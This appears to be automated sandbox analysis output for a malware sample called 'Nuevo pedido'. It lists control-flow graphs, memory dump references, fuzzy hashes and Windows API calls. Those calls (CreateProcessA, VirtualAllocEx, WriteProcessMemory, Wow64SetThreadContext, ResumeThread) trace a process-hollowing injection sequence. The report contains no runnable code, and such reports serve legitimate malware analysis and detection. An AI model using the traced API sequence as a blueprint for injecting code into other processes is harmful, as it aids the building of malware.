                                                                                                                                            Similarity
                                                                                                                                            • API ID: Current$ProcessThread
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2063062207-0
                                                                                                                                            • Opcode ID: cf4c8b780915d3ed06b31c6e539b163e5e3563ca2dc3b77765f3409d5340121e
                                                                                                                                            • Instruction ID: 9a838f07e009cfa28a7f54570c5d460c0fd5942c9949ca75a23e01a915cfc3ea
                                                                                                                                            • Opcode Fuzzy Hash: cf4c8b780915d3ed06b31c6e539b163e5e3563ca2dc3b77765f3409d5340121e
                                                                                                                                            • Instruction Fuzzy Hash: F35146B49002498FDB14DFAAD548BDEFBF1EF88304F208469E419A7360DB75A984CF65

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 338 275ada8-275adb7 339 275ade3-275ade7 338->339 340 275adb9-275adc6 call 275a0cc 338->340 342 275ade9-275adf3 339->342 343 275adfb-275ae3c 339->343 345 275addc 340->345 346 275adc8 340->346 342->343 349 275ae3e-275ae46 343->349 350 275ae49-275ae57 343->350 345->339 393 275adce call 275b031 346->393 394 275adce call 275b040 346->394 349->350 351 275ae59-275ae5e 350->351 352 275ae7b-275ae7d 350->352 354 275ae60-275ae67 call 275a0d8 351->354 355 275ae69 351->355 357 275ae80-275ae87 352->357 353 275add4-275add6 353->345 356 275af18-275afd8 353->356 359 275ae6b-275ae79 354->359 355->359 388 275afe0-275b00b GetModuleHandleW 356->388 389 275afda-275afdd 356->389 360 275ae94-275ae9b 357->360 361 275ae89-275ae91 357->361 359->357 363 275ae9d-275aea5 360->363 364 275aea8-275aeaa call 275a0e8 360->364 361->360 363->364 368 275aeaf-275aeb1 364->368 369 275aeb3-275aebb 368->369 370 275aebe-275aec3 368->370 369->370 371 275aec5-275aecc 370->371 372 275aee1-275aeee 370->372 371->372 374 275aece-275aede call 275a0f8 call 275a108 371->374 379 275af11-275af17 372->379 380 275aef0-275af0e 372->380 374->372 380->379 390 275b014-275b028 388->390 391 275b00d-275b013 388->391 389->388 391->390 393->353 394->353
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0275AFFE
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1729322384.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2750000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: HandleModule
                                                                                                                                            • String ID: (W$(W
                                                                                                                                            • API String ID: 4139908857-3901626427
                                                                                                                                            • Opcode ID: 72c0d045c1245d989017cc760b1362c366cb1899c793af3b0202d17877b4a449
                                                                                                                                            • Instruction ID: 5c842cfc8875afc6b9a544e9f92aaed07e9e0faa7b882fc8cdc12fcc99fcf99d
                                                                                                                                            • Opcode Fuzzy Hash: 72c0d045c1245d989017cc760b1362c366cb1899c793af3b0202d17877b4a449
                                                                                                                                            • Instruction Fuzzy Hash: 9E711470A00B158FD724DF29D45579ABBF1FF88304F008A2DD88A97A50DBB5E949CB91

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 795 2670cc4-2670d65 798 2670d67-2670d71 795->798 799 2670d9e-2670dbe 795->799 798->799 800 2670d73-2670d75 798->800 806 2670df7-2670e26 799->806 807 2670dc0-2670dca 799->807 801 2670d77-2670d81 800->801 802 2670d98-2670d9b 800->802 804 2670d85-2670d94 801->804 805 2670d83 801->805 802->799 804->804 808 2670d96 804->808 805->804 813 2670e5f-2670f19 CreateProcessA 806->813 814 2670e28-2670e32 806->814 807->806 809 2670dcc-2670dce 807->809 808->802 811 2670df1-2670df4 809->811 812 2670dd0-2670dda 809->812 811->806 815 2670dde-2670ded 812->815 816 2670ddc 812->816 827 2670f22-2670fa8 813->827 828 2670f1b-2670f21 813->828 814->813 818 2670e34-2670e36 814->818 815->815 817 2670def 815->817 816->815 817->811 819 2670e59-2670e5c 818->819 820 2670e38-2670e42 818->820 819->813 822 2670e46-2670e55 820->822 823 2670e44 820->823 822->822 825 2670e57 822->825 823->822 825->819 838 2670faa-2670fae 827->838 839 2670fb8-2670fbc 827->839 828->827 838->839 840 2670fb0 838->840 841 2670fbe-2670fc2 839->841 842 2670fcc-2670fd0 839->842 840->839 841->842 843 2670fc4 841->843 844 2670fd2-2670fd6 842->844 845 2670fe0-2670fe4 842->845 843->842 844->845 846 2670fd8 844->846 847 2670ff6-2670ffd 845->847 848 2670fe6-2670fec 845->848 846->845 849 2671014 847->849 850 2670fff-267100e 847->850 848->847 852 2671015 849->852 850->849 852->852
                                                                                                                                            APIs
                                                                                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02670F06
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1728761583.0000000002670000.00000040.00000800.00020000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2670000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateProcess
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 963392458-0
                                                                                                                                            • Opcode ID: 0174f0a15ac47d22ea9386c8bb0c35b2568bfaca640bd6ed91308d8777e74008
                                                                                                                                            • Instruction ID: c20936e7ae997bb6af434364cfdf26cb2b76a33d0f245798213d910a16b9a092
                                                                                                                                            • Opcode Fuzzy Hash: 0174f0a15ac47d22ea9386c8bb0c35b2568bfaca640bd6ed91308d8777e74008
                                                                                                                                            • Instruction Fuzzy Hash: F5A16B71D00219DFDB10DF68D841BDEBBB2FF48314F1481AAE858A7290DB759985CFA2

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 853 2670cd0-2670d65 855 2670d67-2670d71 853->855 856 2670d9e-2670dbe 853->856 855->856 857 2670d73-2670d75 855->857 863 2670df7-2670e26 856->863 864 2670dc0-2670dca 856->864 858 2670d77-2670d81 857->858 859 2670d98-2670d9b 857->859 861 2670d85-2670d94 858->861 862 2670d83 858->862 859->856 861->861 865 2670d96 861->865 862->861 870 2670e5f-2670f19 CreateProcessA 863->870 871 2670e28-2670e32 863->871 864->863 866 2670dcc-2670dce 864->866 865->859 868 2670df1-2670df4 866->868 869 2670dd0-2670dda 866->869 868->863 872 2670dde-2670ded 869->872 873 2670ddc 869->873 884 2670f22-2670fa8 870->884 885 2670f1b-2670f21 870->885 871->870 875 2670e34-2670e36 871->875 872->872 874 2670def 872->874 873->872 874->868 876 2670e59-2670e5c 875->876 877 2670e38-2670e42 875->877 876->870 879 2670e46-2670e55 877->879 880 2670e44 877->880 879->879 882 2670e57 879->882 880->879 882->876 895 2670faa-2670fae 884->895 896 2670fb8-2670fbc 884->896 885->884 895->896 897 2670fb0 895->897 898 2670fbe-2670fc2 896->898 899 2670fcc-2670fd0 896->899 897->896 898->899 900 2670fc4 898->900 901 2670fd2-2670fd6 899->901 902 2670fe0-2670fe4 899->902 900->899 901->902 903 2670fd8 901->903 904 2670ff6-2670ffd 902->904 905 2670fe6-2670fec 902->905 903->902 906 2671014 904->906 907 2670fff-267100e 904->907 905->904 909 2671015 906->909 907->906 909->909
                                                                                                                                            APIs
                                                                                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02670F06
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1728761583.0000000002670000.00000040.00000800.00020000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2670000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateProcess
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 963392458-0
                                                                                                                                            • Opcode ID: bebade3fe57394d4674d91fbb4402ab4464f2cc111b8c4e1505a7da6cc6d7010
                                                                                                                                            • Instruction ID: 7e49936ade900d551c7d0c804b7c871e11fe721d8085a7dbb3ea193e9b68febd
                                                                                                                                            • Opcode Fuzzy Hash: bebade3fe57394d4674d91fbb4402ab4464f2cc111b8c4e1505a7da6cc6d7010
                                                                                                                                            • Instruction Fuzzy Hash: 4C916C71D00219DFDB14DF68D840BDEBBB2FF48314F1481A9E808A7290DB759985CFA2

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 910 275590c-2755916 911 2755918-27559d9 CreateActCtxA 910->911 913 27559e2-2755a3c 911->913 914 27559db-27559e1 911->914 921 2755a3e-2755a41 913->921 922 2755a4b-2755a4f 913->922 914->913 921->922 923 2755a51-2755a5d 922->923 924 2755a60 922->924 923->924 926 2755a61 924->926 926->926
                                                                                                                                            APIs
                                                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 027559C9
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1729322384.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2750000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Create
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2289755597-0
                                                                                                                                            • Opcode ID: 6f82a45e98aca769f9508cea223bb015f147e2c1766f55bdeb18317ac5a8cede
                                                                                                                                            • Instruction ID: 77311da3ea84bd291070bfa744f0f1cfad9be3df36225aaaf5fd48c8f8a71a3a
                                                                                                                                            • Opcode Fuzzy Hash: 6f82a45e98aca769f9508cea223bb015f147e2c1766f55bdeb18317ac5a8cede
                                                                                                                                            • Instruction Fuzzy Hash: 7F41D2B0C00719DFDB24CFA9C884B8EFBB5BF49304F64806AD409AB255DB756989CF90

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 927 27544c4-27559d9 CreateActCtxA 930 27559e2-2755a3c 927->930 931 27559db-27559e1 927->931 938 2755a3e-2755a41 930->938 939 2755a4b-2755a4f 930->939 931->930 938->939 940 2755a51-2755a5d 939->940 941 2755a60 939->941 940->941 943 2755a61 941->943 943->943
                                                                                                                                            APIs
                                                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 027559C9
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1729322384.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2750000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Create
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2289755597-0
                                                                                                                                            • Opcode ID: b2cf29a237f5924db3fed3035f18e45840d53b29bfc558531dd0e60ed5b57a5b
                                                                                                                                            • Instruction ID: 5deda5bb49a136e958403ecd171d13b6b16e62f9356e48f2e599a9235dddc5fa
                                                                                                                                            • Opcode Fuzzy Hash: b2cf29a237f5924db3fed3035f18e45840d53b29bfc558531dd0e60ed5b57a5b
                                                                                                                                            • Instruction Fuzzy Hash: 1141D2B0C00729CFDB24CFA9C844B9EFBB5BF49304F64806AD409AB255DBB56949CF90
                                                                                                                                            APIs
                                                                                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 02670AD8
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1728761583.0000000002670000.00000040.00000800.00020000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2670000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MemoryProcessWrite
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3559483778-0
                                                                                                                                            • Opcode ID: fc7b807a526d6deb9048a1a1d4250926b2448838cf50beb0bd99c60b760f3092
                                                                                                                                            • Instruction ID: ec46c2e1b15a8e559d86e7adc2877d3c1f82bd18bd498e7208bd03306f0e3512
                                                                                                                                            • Opcode Fuzzy Hash: fc7b807a526d6deb9048a1a1d4250926b2448838cf50beb0bd99c60b760f3092
                                                                                                                                            • Instruction Fuzzy Hash: 723178B19003499FCB10CFAAD841BEEBBF0FF48320F10842AE958A7291D7789544CBA4
                                                                                                                                            APIs
                                                                                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 02670AD8
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1728761583.0000000002670000.00000040.00000800.00020000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2670000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MemoryProcessWrite
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3559483778-0
                                                                                                                                            • Opcode ID: bbd5fe5a9f785d0595d990d3d422a78b3f1459898d94e7c013cc0b954b6b2845
                                                                                                                                            • Instruction ID: 7bd52449ee44fc762630e675ba54315798b380064736aa8256bd148fdf95062f
                                                                                                                                            • Opcode Fuzzy Hash: bbd5fe5a9f785d0595d990d3d422a78b3f1459898d94e7c013cc0b954b6b2845
                                                                                                                                            • Instruction Fuzzy Hash: 992125B1900359DFCB10CFA9C985BDEBBF5FF48314F10842AE958A7251C778A944CBA4
                                                                                                                                            APIs
                                                                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0267092E
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1728761583.0000000002670000.00000040.00000800.00020000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2670000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ContextThreadWow64
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 983334009-0
                                                                                                                                            • Opcode ID: b2865f088d972232b5906399dc5871c574754b6e76aca7842d74043622cdfb49
                                                                                                                                            • Instruction ID: 108c594a25850922d835b3582f26592176e04bc4200008f43aa751540ba288e9
                                                                                                                                            • Opcode Fuzzy Hash: b2865f088d972232b5906399dc5871c574754b6e76aca7842d74043622cdfb49
                                                                                                                                            • Instruction Fuzzy Hash: 292136B19003099FDB10CFAAC4847EEFBF4EF48324F10842AD459A7241CB789985CFA5
                                                                                                                                            APIs
                                                                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02670BB8
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1728761583.0000000002670000.00000040.00000800.00020000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2670000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MemoryProcessRead
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1726664587-0
                                                                                                                                            • Opcode ID: 2bc885e37839727efd38be8139bcf148b98105076c28caf1aeddf2199afcf0ea
                                                                                                                                            • Instruction ID: 58a4b33fc4f6413b1ca33f50d57540bc17f0c2b85593cce845313736adc91d8e
                                                                                                                                            • Opcode Fuzzy Hash: 2bc885e37839727efd38be8139bcf148b98105076c28caf1aeddf2199afcf0ea
                                                                                                                                            • Instruction Fuzzy Hash: C02148B1800359DFCB10CFAAC880AEEFBF5FF48314F108429E559A7250D7399940CBA4
                                                                                                                                            APIs
                                                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0275D717
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1729322384.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2750000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DuplicateHandle
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3793708945-0
                                                                                                                                            • Opcode ID: 97ecdfd024bb747d4cbebea7a1f8bae88e488fbd95e066dca30e914ef1284b80
                                                                                                                                            • Instruction ID: faa7bffbd373248dccd9764a43e7da77895d1bf73827b7d54d2b7750ad0f98f0
                                                                                                                                            • Opcode Fuzzy Hash: 97ecdfd024bb747d4cbebea7a1f8bae88e488fbd95e066dca30e914ef1284b80
                                                                                                                                            • Instruction Fuzzy Hash: 3E2103B5900259EFDB10CFAAD584ADEFBF4EB48314F10842AE918B3310C375A940CFA1
                                                                                                                                            APIs
                                                                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02670BB8
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1728761583.0000000002670000.00000040.00000800.00020000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2670000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MemoryProcessRead
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1726664587-0
                                                                                                                                            • Opcode ID: 6bf4cd3d32922562d35d93716b5566641afb083756b8c86295b428767f6d5d77
                                                                                                                                            • Instruction ID: 6bb22201c03ebc90ff7b1a617d9b1e9154e8b89ec4ee68bc06aa45b5d058f0b0
                                                                                                                                            • Opcode Fuzzy Hash: 6bf4cd3d32922562d35d93716b5566641afb083756b8c86295b428767f6d5d77
                                                                                                                                            • Instruction Fuzzy Hash: 132125B1900359DFCB10DFAAC980AEEFBF5FF48324F10842AE559A7250D7399944CBA5
                                                                                                                                            APIs
                                                                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0267092E
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1728761583.0000000002670000.00000040.00000800.00020000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2670000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ContextThreadWow64
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 983334009-0
                                                                                                                                            • Opcode ID: 475ddd0a02f27e1fc4b8099c77e2c29e2e8f6028df546cc8a246908bff3834a0
                                                                                                                                            • Instruction ID: 5c9649d73021bfe5cc16272d318e199203a59c43f27f4d213c6eb830828c5ba9
                                                                                                                                            • Opcode Fuzzy Hash: 475ddd0a02f27e1fc4b8099c77e2c29e2e8f6028df546cc8a246908bff3834a0
                                                                                                                                            • Instruction Fuzzy Hash: A52149B19003099FDB10DFAAC485BEEFBF4EF88324F108429D459A7240CB789945CFA5
                                                                                                                                            APIs
                                                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0275D717
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1729322384.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2750000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DuplicateHandle
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3793708945-0
                                                                                                                                            • Opcode ID: 4ab3db1f602e0d39f55281c4273a6417b0fc452ff2a7a73ab337c70cb2475afa
                                                                                                                                            • Instruction ID: edf9cbad21c11c809b45eef9f8eb39c4b7666314c61c49140ca12836d63ab1d1
                                                                                                                                            • Opcode Fuzzy Hash: 4ab3db1f602e0d39f55281c4273a6417b0fc452ff2a7a73ab337c70cb2475afa
                                                                                                                                            • Instruction Fuzzy Hash: 9D21E4B5900259EFDB10CF9AD584ADEFBF4FB48310F14841AE914A3310D375A940CFA5
                                                                                                                                            APIs
                                                                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 026709F6
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1728761583.0000000002670000.00000040.00000800.00020000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2670000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                            • Opcode ID: 39f2055c77739dddfd0d948f72df5c969ea1ac8c4632ca272cbb35fa9fb71450
                                                                                                                                            • Instruction ID: bf27d4ffdc94b52a8f744491643eb490fb981b4cf43fdf3d91c58480e10bba28
                                                                                                                                            • Opcode Fuzzy Hash: 39f2055c77739dddfd0d948f72df5c969ea1ac8c4632ca272cbb35fa9fb71450
                                                                                                                                            • Instruction Fuzzy Hash: 202158729002489FCB10DFAAD445ADEFFF5EB88320F10841AE555A7260CB75A580CFA5
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1737127749.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_6f30000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ResumeThread
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 947044025-0
                                                                                                                                            • Opcode ID: 9fe83408cbc7d49c88cfdf95d8b59cc9894728463a0562707aaf95e5443d6609
                                                                                                                                            • Instruction ID: 6d3eabd138e817d981d04a95464c061eeb146ee91f6d387010ee82a296ab76d3
                                                                                                                                            • Opcode Fuzzy Hash: 9fe83408cbc7d49c88cfdf95d8b59cc9894728463a0562707aaf95e5443d6609
                                                                                                                                            • Instruction Fuzzy Hash: 97116AB1C002598FCB10DFAAC4447EEFBF5EB88324F20842AD419A7250CB35A940CBA4
                                                                                                                                            APIs
                                                                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 026709F6
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1728761583.0000000002670000.00000040.00000800.00020000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2670000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                            • Opcode ID: 81ddd1ed9a996f3862524e235fa5fb69bc35d6ffada1ceff62e4da9c02e9079b
                                                                                                                                            • Instruction ID: 7422ff77061486d379f4cde8110c4cac50d3372c3347c1601a9395806eb88663
                                                                                                                                            • Opcode Fuzzy Hash: 81ddd1ed9a996f3862524e235fa5fb69bc35d6ffada1ceff62e4da9c02e9079b
                                                                                                                                            • Instruction Fuzzy Hash: 921126719002499FCB10DFAAC844BDFFFF5EB88324F108419E559A7250CB75A544CFA5
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1737127749.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_6f30000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ResumeThread
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 947044025-0
                                                                                                                                            • Opcode ID: f9f67ce602d6074b55499ee30fd46e2477f82000c82841cdd233735b760cf065
                                                                                                                                            • Instruction ID: ffb9f00479dcb4eb7b4ab61204ec39b43f1dc5ce2f0bd96da228dc19a8652540
                                                                                                                                            • Opcode Fuzzy Hash: f9f67ce602d6074b55499ee30fd46e2477f82000c82841cdd233735b760cf065
                                                                                                                                            • Instruction Fuzzy Hash: DE1136B1D002598FCB20DFAAC445BDEFBF4EB88324F208429D459A7250CB79A944CFA5
                                                                                                                                            APIs
                                                                                                                                            • PostMessageW.USER32(?,?,?,?), ref: 02674CE5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1728761583.0000000002670000.00000040.00000800.00020000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2670000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessagePost
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 410705778-0
                                                                                                                                            • Opcode ID: 7eb285d343d897f3e5439d0d86b24669c8aba6091018cfb2bb83f5d58a0e7fbb
                                                                                                                                            • Instruction ID: 300f9a541316d9b5aec9d8104c52456968c878bdb535ba351482ad8a068f5992
                                                                                                                                            • Opcode Fuzzy Hash: 7eb285d343d897f3e5439d0d86b24669c8aba6091018cfb2bb83f5d58a0e7fbb
                                                                                                                                            • Instruction Fuzzy Hash: 781102B5800249DFDB10CF99C545BDEBBF8EB48310F108419E958A3210C375A940CFA5
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0275AFFE
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1729322384.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2750000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: HandleModule
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4139908857-0
                                                                                                                                            • Opcode ID: 9ee4667b4547acfa20da9ac0a1cc6a9e7bf28e267062b4e65ccc9932dfbd4ce2
                                                                                                                                            • Instruction ID: 1c30e273c23efaaba7803cd51ea559564dcca460fc4768a314c6def8379702f3
                                                                                                                                            • Opcode Fuzzy Hash: 9ee4667b4547acfa20da9ac0a1cc6a9e7bf28e267062b4e65ccc9932dfbd4ce2
                                                                                                                                            • Instruction Fuzzy Hash: 4111DFB6D002598FCB14CF9AC444ADEFBF4AF88228F10846AD869A7210D379A545CFA5
                                                                                                                                            APIs
                                                                                                                                            • PostMessageW.USER32(?,?,?,?), ref: 02674CE5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1728761583.0000000002670000.00000040.00000800.00020000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2670000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessagePost
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 410705778-0
                                                                                                                                            • Opcode ID: 5b7f577b9484f0106115f4687464c0bf25b37229c7d153d30c13d2cde19945ea
                                                                                                                                            • Instruction ID: dfd0945c14657c9737ff5c18f317681acc9f1623b66ab43ffc9c06fcefe6a32a
                                                                                                                                            • Opcode Fuzzy Hash: 5b7f577b9484f0106115f4687464c0bf25b37229c7d153d30c13d2cde19945ea
                                                                                                                                            • Instruction Fuzzy Hash: 6C11F2B5800249DFCB10CF9AD589BDEFBF8EB48324F108419E558A7210C775A544CFA5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1727367403.0000000000BBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BBD000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_bbd000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 5618673601aa9cf3fb406f056308fe351ac13b80b346e968690e3031d0101644
                                                                                                                                            • Instruction ID: 581fda97e36f07f4380233ff7fc34ab6b863e3771ede564c070671b195d6c1bf
                                                                                                                                            • Opcode Fuzzy Hash: 5618673601aa9cf3fb406f056308fe351ac13b80b346e968690e3031d0101644
                                                                                                                                            • Instruction Fuzzy Hash: D1212871500204DFDB05DF14D9C0B66BFA5FB94314F20C6A9D9094B356D37AE856C6A2
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1727975528.0000000000E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0D000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_e0d000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 311bc8739ec9aebb0c857ce8e12247e9233cfb5c99caaedd17c0b13452cbc39c
                                                                                                                                            • Instruction ID: ca911c107ccca57c1003ef369f91b9138e7d6484bda20c7b33d33cf547f88dbd
                                                                                                                                            • Opcode Fuzzy Hash: 311bc8739ec9aebb0c857ce8e12247e9233cfb5c99caaedd17c0b13452cbc39c
